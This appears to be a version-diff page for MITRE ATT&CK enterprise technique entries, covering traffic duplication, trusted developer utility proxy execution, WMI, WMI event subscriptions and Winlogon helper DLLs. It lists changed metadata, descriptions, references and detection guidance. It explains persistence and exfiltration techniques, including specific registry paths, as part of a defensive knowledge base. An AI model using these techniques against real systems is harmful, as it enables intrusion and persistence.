external_references[4]['description']Mathers, B. (2017, May 31). Windows Time Service Tools and Settings. Retrieved March 26, 2018.Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
external_references[4]['url']https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settingshttps://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
x_mitre_data_sources[0]Windows Registry: Windows Registry Key ModificationProcess: Process Creation
x_mitre_data_sources[1]Module: Module LoadCommand: Command Execution
x_mitre_data_sources[2]Command: Command ExecutionModule: Module Load
x_mitre_data_sources[3]Process: Process CreationWindows Registry: Windows Registry Key Modification
x_mitre_detectionBaseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017) The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns)Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility.(Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk.(Citation: Github W32Time Oct 2017) The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers.(Citation: TechNet Autoruns)

[T1020.001] Automated Exfiltration: Traffic Duplication

Current version: 1.1


Old Description
New Description
t1Adversaries may leverage traffic mirroring in order to automt1Adversaries may leverage traffic mirroring in order to autom
>ate data exfiltration over compromised network infrastructur>ate data exfiltration over compromised network infrastructur
>e.  Traffic mirroring is a native feature for some network d>e.  Traffic mirroring is a native feature for some network d
>evices and used for network analysis and may be configured t>evices and used for network analysis and may be configured t
>o duplicate traffic and forward to one or more destinations >o duplicate traffic and forward to one or more destinations 
>for analysis by a network analyzer or other monitoring devic>for analysis by a network analyzer or other monitoring devic
>e. (Citation: Cisco Traffic Mirroring) (Citation: Juniper Tr>e. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Tra
>affic Mirroring)  Adversaries may abuse traffic mirroring to>ffic Mirroring)  Adversaries may abuse traffic mirroring to 
> mirror or redirect network traffic through other network in>mirror or redirect network traffic through other network inf
>frastructure they control. Malicious modifications to networ>rastructure they control. Malicious modifications to network
>k devices to enable traffic redirection may be possible thro> devices to enable traffic redirection may be possible throu
>ugh [ROMMONkit](https://attack.mitre.org/techniques/T1542/00>gh [ROMMONkit](https://attack.mitre.org/techniques/T1542/004
>4) or [Patch System Image](https://attack.mitre.org/techniqu>) or [Patch System Image](https://attack.mitre.org/technique
>es/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco >s/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco B
>Blog Legacy Device Attacks) Adversaries may use traffic dupl>log Legacy Device Attacks) Adversaries may use traffic dupli
>ication in conjunction with [Network Sniffing](https://attac>cation in conjunction with [Network Sniffing](https://attack
>k.mitre.org/techniques/T1040), [Input Capture](https://attac>.mitre.org/techniques/T1040), [Input Capture](https://attack
>k.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](>.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](h
>https://attack.mitre.org/techniques/T1557) depending on the >ttps://attack.mitre.org/techniques/T1557) depending on the g
>goals and objectives of the adversary.>oals and objectives of the adversary.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesCisco. (n.d.). Cisco IOS XR Interface and Hardware Component Configuration Guide for the Cisco CRS Router, Release 5.1.x. Retrieved October 19, 2020.
external_referencesCAPEC-117
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['Administrator']
external_referencesCAPEC-117
external_referencesOmar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.
values_changed
STIX FieldOld valueNew Value
modified2021-08-16 15:23:37.640000+00:002022-04-18 22:16:51.359000+00:00
descriptionAdversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure. Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring) (Citation: Juniper Traffic Mirroring) Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure. Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring) Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.
external_references[1]['source_name']capecCisco Traffic Mirroring
external_references[1]['url']https://capec.mitre.org/data/definitions/117.htmlhttps://www.cisco.com/c/en/us/td/docs/routers/crs/software/crs_r5-1/interfaces/configuration/guide/hc51xcrsbook/hc51span.html
external_references[2]['source_name']Cisco Traffic MirroringJuniper Traffic Mirroring
external_references[2]['description']Cisco. (n.d.). Cisco IOS XR Interface and Hardware Component Configuration Guide for the Cisco CRS Router, Release 5.1.x. Retrieved October 19, 2020.Juniper. (n.d.). Understanding Port Mirroring on EX2200, EX3200, EX3300, EX4200, EX4500, EX4550, EX6200, and EX8200 Series Switches. Retrieved October 19, 2020.
external_references[2]['url']https://www.cisco.com/c/en/us/td/docs/routers/crs/software/crs_r5-1/interfaces/configuration/guide/hc51xcrsbook/hc51span.htmlhttps://www.juniper.net/documentation/en_US/junos/topics/concept/port-mirroring-ex-series.html
external_references[3]['source_name']Juniper Traffic MirroringCisco Blog Legacy Device Attacks
external_references[3]['description']Juniper. (n.d.). Understanding Port Mirroring on EX2200, EX3200, EX3300, EX4200, EX4500, EX4550, EX6200, and EX8200 Series Switches. Retrieved October 19, 2020.Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.
external_references[3]['url']https://www.juniper.net/documentation/en_US/junos/topics/concept/port-mirroring-ex-series.htmlhttps://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
external_references[5]['source_name']Cisco Blog Legacy Device Attackscapec
external_references[5]['url']https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954https://capec.mitre.org/data/definitions/117.html
x_mitre_data_sources[0]Network Traffic: Network Connection CreationNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[1]Network Traffic: Network Traffic FlowNetwork Traffic: Network Connection Creation

[T1127] Trusted Developer Utilities Proxy Execution

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 23:57:08.312000+00:002022-05-05 05:00:37.443000+00:00
external_references[1]['source_name']engima0x3 DNX BypassExploit Monday WinDbg
external_references[1]['description']Nelson, M. (2017, November 17). Bypassing Application Whitelisting By Using dnx.exe. Retrieved May 25, 2017.Graeber, M. (2016, August 15). Bypassing Application Whitelisting by using WinDbg/CDB as a Shellcode Runner. Retrieved May 26, 2017.
external_references[1]['url']https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
external_references[2]['source_name']engima0x3 RCSI BypassLOLBAS Tracker
external_references[2]['description']Nelson, M. (2016, November 21). Bypassing Application Whitelisting By Using rcsi.exe. Retrieved May 26, 2017.LOLBAS. (n.d.). Tracker.exe. Retrieved July 31, 2019.
external_references[2]['url']https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/
external_references[3]['source_name']Exploit Monday WinDbgengima0x3 RCSI Bypass
external_references[3]['description']Graeber, M. (2016, August 15). Bypassing Application Whitelisting by using WinDbg/CDB as a Shellcode Runner. Retrieved May 26, 2017.Nelson, M. (2016, November 21). Bypassing Application Whitelisting By Using rcsi.exe. Retrieved May 26, 2017.
external_references[3]['url']http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.htmlhttps://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/
external_references[4]['source_name']LOLBAS Trackerengima0x3 DNX Bypass
external_references[4]['description']LOLBAS. (n.d.). Tracker.exe. Retrieved July 31, 2019.Nelson, M. (2017, November 17). Bypassing Application Whitelisting By Using dnx.exe. Retrieved May 25, 2017.
external_references[4]['url']https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
x_mitre_defense_bypassed[0]Application controlApplication Control

[T1552] Unsecured Credentials

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-12 18:32:33.620000+00:002022-04-01 13:11:11.386000+00:00
x_mitre_data_sources[0]Command: Command ExecutionProcess: Process Creation
x_mitre_data_sources[2]Process: Process CreationWindows Registry: Windows Registry Key Access
x_mitre_data_sources[4]Windows Registry: Windows Registry Key AccessCommand: Command Execution

[T1550] Use Alternate Authentication Material

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-17 14:15:31.630000+00:002022-04-01 12:57:34.058000+00:00
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesApplication Log: Application Log Content
x_mitre_platformsContainers
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesApplication Log: Application Log Content

[T1047] Windows Management Instrumentation

Current version: 1.2


Old Description
New Description
t1Adversaries may abuse Windows Management Instrumentation (WMt1Adversaries may abuse Windows Management Instrumentation (WM
>I) to execute malicious commands and payloads. WMI is an adm>I) to execute malicious commands and payloads. WMI is an adm
>inistration feature that provides a uniform environment to a>inistration feature that provides a uniform environment to a
>ccess Windows system components. The WMI service enables bot>ccess Windows system components. The WMI service enables bot
>h local and remote access, though the latter is facilitated >h local and remote access, though the latter is facilitated 
>by [Remote Services](https://attack.mitre.org/techniques/T10>by [Remote Services](https://attack.mitre.org/techniques/T10
>21) such as [Distributed Component Object Model](https://att>21) such as [Distributed Component Object Model](https://att
>ack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remo>ack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remo
>te Management](https://attack.mitre.org/techniques/T1021/006>te Management](https://attack.mitre.org/techniques/T1021/006
>) (WinRM). (Citation: MSDN WMI) Remote WMI over DCOM operate>) (WinRM).(Citation: MSDN WMI) Remote WMI over DCOM operates
>s using port 135, whereas WMI over WinRM operates over port > using port 135, whereas WMI over WinRM operates over port 5
>5985 when using HTTP and 5986 for HTTPS. (Citation: MSDN WMI>985 when using HTTP and 5986 for HTTPS.(Citation: MSDN WMI)(
>) (Citation: FireEye WMI 2015)  An adversary can use WMI to >Citation: FireEye WMI 2015)  An adversary can use WMI to int
>interact with local and remote systems and use it as a means>eract with local and remote systems and use it as a means to
> to execute various behaviors, such as gathering information> execute various behaviors, such as gathering information fo
> for Discovery as well as remote Execution of files as part >r Discovery as well as remote Execution of files as part of 
>of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Cita>Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citatio
>tion: FireEye WMI 2015)>n: FireEye WMI 2015)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'Administrator']
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 23:58:07.715000+00:002022-04-20 16:25:21.348000+00:00
descriptionAdversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM). (Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS. (Citation: MSDN WMI) (Citation: FireEye WMI 2015) An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM).(Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: MSDN WMI)(Citation: FireEye WMI 2015) An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)
external_references[1]['source_name']MSDN WMIFireEye WMI 2015
external_references[1]['description']Microsoft. (n.d.). Windows Management Instrumentation. Retrieved April 27, 2016.Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.
external_references[1]['url']https://msdn.microsoft.com/en-us/library/aa394582.aspxhttps://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
external_references[2]['source_name']FireEye WMI 2015FireEye WMI SANS 2015
external_references[2]['description']Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.Devon Kerr. (2015). There's Something About WMI. Retrieved May 4, 2020.
external_references[2]['url']https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdfhttps://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf
external_references[3]['source_name']FireEye WMI SANS 2015MSDN WMI
external_references[3]['description']Devon Kerr. (2015). There's Something About WMI. Retrieved May 4, 2020.Microsoft. (n.d.). Windows Management Instrumentation. Retrieved April 27, 2016.
external_references[3]['url']https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdfhttps://msdn.microsoft.com/en-us/library/aa394582.aspx
x_mitre_data_sources[1]Process: Process CreationNetwork Traffic: Network Connection Creation
x_mitre_data_sources[2]Network Traffic: Network Connection CreationProcess: Process Creation

[T1546.003] Event Triggered Execution: Windows Management Instrumentation Event Subscription

Current version: 1.2


Old Description
New Description
t1Adversaries may establish persistence and elevate privilegest1Adversaries may establish persistence and elevate privileges
> by executing malicious content triggered by a Windows Manag> by executing malicious content triggered by a Windows Manag
>ement Instrumentation (WMI) event subscription. WMI can be u>ement Instrumentation (WMI) event subscription. WMI can be u
>sed to install event filters, providers, consumers, and bind>sed to install event filters, providers, consumers, and bind
>ings that execute code when a defined event occurs. Examples>ings that execute code when a defined event occurs. Examples
> of events that may be subscribed to are the wall clock time> of events that may be subscribed to are the wall clock time
>, user loging, or the computer's uptime. (Citation: Mandiant>, user loging, or the computer's uptime.(Citation: Mandiant 
> M-Trends 2015)  Adversaries may use the capabilities of WMI>M-Trends 2015)  Adversaries may use the capabilities of WMI 
> to subscribe to an event and execute arbitrary code when th>to subscribe to an event and execute arbitrary code when tha
>at event occurs, providing persistence on a system. (Citatio>t event occurs, providing persistence on a system.(Citation:
>n: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adver> FireEye WMI SANS 2015)(Citation: FireEye WMI 2015) Adversar
>saries may also compile WMI scripts into Windows Management >ies may also compile WMI scripts into Windows Management Obj
>Object (MOF) files (.mof extension) that can be used to crea>ect (MOF) files (.mof extension) that can be used to create 
>te a malicious subscription. (Citation: Dell WMI Persistence>a malicious subscription.(Citation: Dell WMI Persistence)(Ci
>) (Citation: Microsoft MOF May 2018)  WMI subscription execu>tation: Microsoft MOF May 2018)  WMI subscription execution 
>tion is proxied by the WMI Provider Host process (WmiPrvSe.e>is proxied by the WMI Provider Host process (WmiPrvSe.exe) a
>xe) and thus may result in elevated SYSTEM privileges.>nd thus may result in elevated SYSTEM privileges.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-16 20:11:13.719000+00:002022-04-20 17:01:37.760000+00:00
descriptionAdversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime. (Citation: Mandiant M-Trends 2015) Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018) WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime.(Citation: Mandiant M-Trends 2015) Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.(Citation: FireEye WMI SANS 2015)(Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription.(Citation: Dell WMI Persistence)(Citation: Microsoft MOF May 2018) WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.
external_references[1]['source_name']Mandiant M-Trends 2015FireEye WMI 2015
external_references[1]['description']Mandiant. (2015, February 24). M-Trends 2015: A View from the Front Lines. Retrieved May 18, 2016.Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.
external_references[1]['url']https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdfhttps://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
external_references[2]['source_name']FireEye WMI SANS 2015Dell WMI Persistence
external_references[2]['description']Devon Kerr. (2015). There's Something About WMI. Retrieved May 4, 2020.Dell SecureWorks Counter Threat Unit™ (CTU) Research Team. (2016, March 28). A Novel WMI Persistence Implementation. Retrieved March 30, 2016.
external_references[2]['url']https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdfhttps://www.secureworks.com/blog/wmi-persistence
external_references[3]['source_name']FireEye WMI 2015FireEye WMI SANS 2015
external_references[3]['description']Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.Devon Kerr. (2015). There's Something About WMI. Retrieved May 4, 2020.
external_references[3]['url']https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdfhttps://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf
external_references[4]['source_name']Dell WMI PersistenceMedium Detecting WMI Persistence
external_references[4]['description']Dell SecureWorks Counter Threat Unit™ (CTU) Research Team. (2016, March 28). A Novel WMI Persistence Implementation. Retrieved March 30, 2016.French, D. (2018, October 9). Detecting & Removing an Attacker’s WMI Persistence. Retrieved October 11, 2019.
external_references[4]['url']https://www.secureworks.com/blog/wmi-persistencehttps://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96
external_references[5]['source_name']Microsoft MOF May 2018Elastic - Hunting for Persistence Part 1
external_references[5]['description']Satran, M. (2018, May 30). Managed Object Format (MOF). Retrieved January 24, 2020.French, D., Murphy, B. (2020, March 24). Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 1). Retrieved December 21, 2020.
external_references[5]['url']https://docs.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format--mof-https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1
external_references[6]['source_name']TechNet AutorunsMandiant M-Trends 2015
external_references[6]['description']Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.Mandiant. (2015, February 24). M-Trends 2015: A View from the Front Lines. Retrieved May 18, 2016.
external_references[6]['url']https://technet.microsoft.com/en-us/sysinternals/bb963902https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf
external_references[7]['source_name']Medium Detecting WMI PersistenceMicrosoft Register-WmiEvent
external_references[7]['description']French, D. (2018, October 9). Detecting & Removing an Attacker’s WMI Persistence. Retrieved October 11, 2019.Microsoft. (n.d.). Retrieved January 24, 2020.
external_references[7]['url']https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/register-wmievent?view=powershell-5.1
external_references[8]['source_name']Elastic - Hunting for Persistence Part 1TechNet Autoruns
external_references[8]['description']French, D., Murphy, B. (2020, March 24). Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 1). Retrieved December 21, 2020.Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.
external_references[8]['url']https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1https://technet.microsoft.com/en-us/sysinternals/bb963902
external_references[9]['source_name']Microsoft Register-WmiEventMicrosoft MOF May 2018
external_references[9]['description']Microsoft. (n.d.). Retrieved January 24, 2020.Satran, M. (2018, May 30). Managed Object Format (MOF). Retrieved January 24, 2020.
external_references[9]['url']https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/register-wmievent?view=powershell-5.1https://docs.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format--mof-
x_mitre_detectionMonitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: Medium Detecting WMI Persistence) Monitor for the creation of new WMI EventFilter, EventConsumer, and FilterToConsumerBinding events. Event ID 5861 is logged on Windows 10 systems when new EventFilterToConsumerBinding events are created.(Citation: Elastic - Hunting for Persistence Part 1) Monitor processes and command-line arguments that can be used to register WMI persistence, such as the Register-WmiEvent [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet (Citation: Microsoft Register-WmiEvent), as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process).Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence.(Citation: TechNet Autoruns)(Citation: Medium Detecting WMI Persistence) Monitor for the creation of new WMI EventFilter, EventConsumer, and FilterToConsumerBinding events. Event ID 5861 is logged on Windows 10 systems when new EventFilterToConsumerBinding events are created.(Citation: Elastic - Hunting for Persistence Part 1) Monitor processes and command-line arguments that can be used to register WMI persistence, such as the Register-WmiEvent [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process).(Citation: Microsoft Register-WmiEvent)
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesWMI: WMI Creation
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesWMI: WMI Creation

[T1547.004] Boot or Logon Autostart Execution: Winlogon Helper DLL

Current version: 1.0


Old Description
New Description
t1Adversaries may abuse features of Winlogon to execute DLLs at1Adversaries may abuse features of Winlogon to execute DLLs a
>nd/or executables when a user logs in. Winlogon.exe is a Win>nd/or executables when a user logs in. Winlogon.exe is a Win
>dows component responsible for actions at logon/logoff as we>dows component responsible for actions at logon/logoff as we
>ll as the secure attention sequence (SAS) triggered by Ctrl->ll as the secure attention sequence (SAS) triggered by Ctrl-
>Alt-Delete. Registry entries in <code>HKLM\Software[\\Wow643>Alt-Delete. Registry entries in <code>HKLM\Software[\\Wow643
>2Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\</code>2Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\</code
>> and <code>HKCU\Software\Microsoft\Windows NT\CurrentVersio>> and <code>HKCU\Software\Microsoft\Windows NT\CurrentVersio
>n\Winlogon\</code> are used to manage additional helper prog>n\Winlogon\</code> are used to manage additional helper prog
>rams and functionalities that support Winlogon. (Citation: C>rams and functionalities that support Winlogon.(Citation: Cy
>ylance Reg Persistence Sept 2013)   Malicious modifications >lance Reg Persistence Sept 2013)   Malicious modifications t
>to these Registry keys may cause Winlogon to load and execut>o these Registry keys may cause Winlogon to load and execute
>e malicious DLLs and/or executables. Specifically, the follo> malicious DLLs and/or executables. Specifically, the follow
>wing subkeys have been known to be possibly vulnerable to ab>ing subkeys have been known to be possibly vulnerable to abu
>use: (Citation: Cylance Reg Persistence Sept 2013)  * Winlog>se: (Citation: Cylance Reg Persistence Sept 2013)  * Winlogo
>on\Notify - points to notification package DLLs that handle >n\Notify - points to notification package DLLs that handle W
>Winlogon events * Winlogon\Userinit - points to userinit.exe>inlogon events * Winlogon\Userinit - points to userinit.exe,
>, the user initialization program executed when a user logs > the user initialization program executed when a user logs o
>on * Winlogon\Shell - points to explorer.exe, the system she>n * Winlogon\Shell - points to explorer.exe, the system shel
>ll executed when a user logs on  Adversaries may take advant>l executed when a user logs on  Adversaries may take advanta
>age of these features to repeatedly execute malicious code a>ge of these features to repeatedly execute malicious code an
>nd establish persistence.>d establish persistence.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesLangendorf, S. (2013, September 24). Windows Registry Persistence, Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.
external_referencesCAPEC-579
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-579
external_referencesRussinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.
values_changed
STIX FieldOld valueNew Value
modified2020-04-21 16:00:41.277000+00:002022-04-20 16:32:14.691000+00:00
descriptionAdversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[\\Wow6432Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013) Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013) * Winlogon\Notify - points to notification package DLLs that handle Winlogon events * Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on * Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) 